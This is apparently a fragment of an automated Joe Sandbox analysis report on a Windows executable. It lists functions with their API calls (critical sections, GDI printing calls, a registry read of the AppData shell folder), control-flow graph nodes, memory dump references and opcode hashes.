                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                                                                                                                        • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                                                                                                        • API String ID: 3944000476-502054578
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                        • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA
                                                                                                                                                                                                                                                                                                        Function 004F5FC0 Relevance: 17.8, APIs: 14, Instructions: 252COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 949 4f5fc0-4f5fd7 950 4f5fdd-4f5ff0 call 4f5cb0 949->950 951 4f6093-4f6095 949->951 963 4f605d-4f6065 950->963 964 4f5ff2-4f6058 call 4fe010 950->964 953 4f60f7-4f60f9 951->953 954 4f6097-4f609f 951->954 956 4f60ff-4f6101 953->956 957 4f61a1 953->957 958 4f60b2-4f60ba 954->958 959 4f60a1-4f60a6 954->959 961 4f62e5-4f62ec 956->961 965 4f6107-4f6148 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection call 4f2bf0 956->965 960 4f61a7-4f61a9 957->960 957->961 958->953 962 4f60bc-4f60be 958->962 959->958 966 4f60a8-4f60b0 959->966 960->961 967 4f61af-4f61c2 call 4f24f0 960->967 968 4f60d3 962->968 969 4f60c0-4f60c5 962->969 963->951 971 4f6067-4f607c EnterCriticalSection 963->971 964->963 980 4f614a 965->980 981 4f6167-4f6174 call 4f2bf0 965->981 966->958 966->962 983 4f624e-4f625b call 4f24f0 967->983 984 4f61c8-4f61ce 967->984 975 4f60d9-4f60f2 call 4e5ec0 968->975 969->968 974 4f60c7-4f60d1 969->974 976 4f607e 971->976 977 4f6085-4f608d LeaveCriticalSection 971->977 974->968 974->975 975->953 976->977 977->951 982 4f6150-4f6165 call 4f3d00 call 4f2bf0 980->982 981->961 997 4f617a 981->997 982->981 983->961 998 4f6261 983->998 989 4f61d0-4f61df EnterCriticalSection 984->989 994 4f61e6-4f61ef 989->994 995 4f61e1 989->995 1000 4f6201-4f620a 994->1000 1001 4f61f1-4f61ff 994->1001 995->994 1002 4f6180-4f6195 call 4f3d00 call 4f2bf0 997->1002 1003 4f6267-4f6276 EnterCriticalSection 998->1003 1005 4f6211-4f622b LeaveCriticalSection EnterCriticalSection 1000->1005 1001->1005 1021 4f6197-4f619e 1002->1021 1007 4f627d-4f6286 1003->1007 1008 4f6278 1003->1008 1009 4f622d-4f6233 1005->1009 1010 4f6240-4f624c LeaveCriticalSection 1005->1010 1012 4f6298-4f62a1 1007->1012 1013 4f6288-4f6296 1007->1013 1008->1007 1014 4f623a-4f623d 1009->1014 1015 4f6235-4f6238 1009->1015 1010->983 1010->989 1017 4f62a8-4f62c2 LeaveCriticalSection EnterCriticalSection 1012->1017 1013->1017 1014->1010 1015->1010 1019 4f62d7-4f62e3 LeaveCriticalSection 1017->1019 1020 4f62c4-4f62ca 1017->1020 1019->961 1019->1003 1022 4f62cc-4f62cf 1020->1022 1023 4f62d1-4f62d4 1020->1023 1022->1019 1023->1019
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                        • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                                                                                                                        Function 004D7EF0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                                                                                                                        • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CapsDevice$Start
                                                                                                                                                                                                                                                                                                        • String ID: portrait
                                                                                                                                                                                                                                                                                                        • API String ID: 1738886688-2504013051
                                                                                                                                                                                                                                                                                                        • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                                                                                                                        Function 004F7040 Relevance: 15.3, APIs: 10, Instructions: 296timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 4022644143-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                                                                                                                        Function 004F2A10 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 79timeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                                                                                                                        • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                                                                                                                        • API String ID: 2943255653-4242577526
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                        • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                                                                                                                        Function 004F3EC0 Relevance: 13.7, APIs: 9, Instructions: 245COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000001F.00000002.1932835041.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932805887.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932944234.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1932991947.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933070346.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933192683.00000000006E7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933222066.00000000006EA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933249657.00000000006F5000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933282783.00000000006F9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933314038.0000000000700000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933349244.0000000000703000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933377675.0000000000709000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933407438.000000000070E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933443184.000000000073C000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000001F.00000002.1933473851.000000000073F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_31_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 85195bc957575009e4a7604c5a43e45099f91f30af12cfc7e5b33174ac27f883
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34f8658622f1aa9e900f4973e8c3da322a382f9696d29d907fda60f1af10eeb7
